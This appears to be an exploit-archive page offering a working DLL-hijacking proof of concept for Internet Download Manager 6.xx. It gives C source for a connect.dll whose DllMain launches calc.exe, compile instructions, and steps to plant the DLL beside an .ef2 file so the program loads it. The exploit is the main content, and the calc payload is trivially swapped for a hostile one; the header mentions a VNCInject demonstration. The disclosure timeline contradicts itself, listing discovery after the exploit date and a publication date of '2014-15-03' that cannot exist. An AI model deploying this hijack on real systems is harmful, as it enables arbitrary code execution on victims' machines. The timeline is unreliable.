Internet Download Manager 6.xx DLL Hijacking



EKU-ID: 4747 CVE: OSVDB-ID:
Author: TUNISIAN CYBER Published: 2015-04-14 Verified: Verified
Download:

Rating

☆☆☆☆☆
Home


/*
#[+] Author: TUNISIAN CYBER
#[+] Exploit Title: Internet Download Manager 6.XX DLL Hijacking
#[+] Date: 30-03-2015
#[+] Type: Local Exploits
#[+] Vendor: http://www.internetdownloadmanager.com/
#[+] Tested on: WinXp
#[+] Friendly Sites: sec4ever.com
#[+] Twitter: @TCYB3R
#[+] POC IMG:http://i.imgur.com/qfkEFR8.png (VNCInject)
#[+] gcc -shared -o connect.dll  dllhijack.c
#[+] create .ef2 file and put it with connect.dll in the same dir.calc.exe will popup
#[+]Proof of Concept (PoC):
#[+]Timle Line:
07/04/2015:Vulnerability was discovered.
09/04/2015: Contact with vendor.
10/04/2015: No reply.
11/04/2015: Vendor Refused to patch the vulnerability.
2014-15-03: Vulnerability Published
=======================
*/

#include <windows.h>

int tunisian()
{
WinExec("calc", 0);
exit(0);
return 0;
}

BOOL WINAPI DllMain(HINSTANCE hinstDLL,DWORD fdwReason, LPVOID lpvReserved)
{
tunisian();
return 0;
}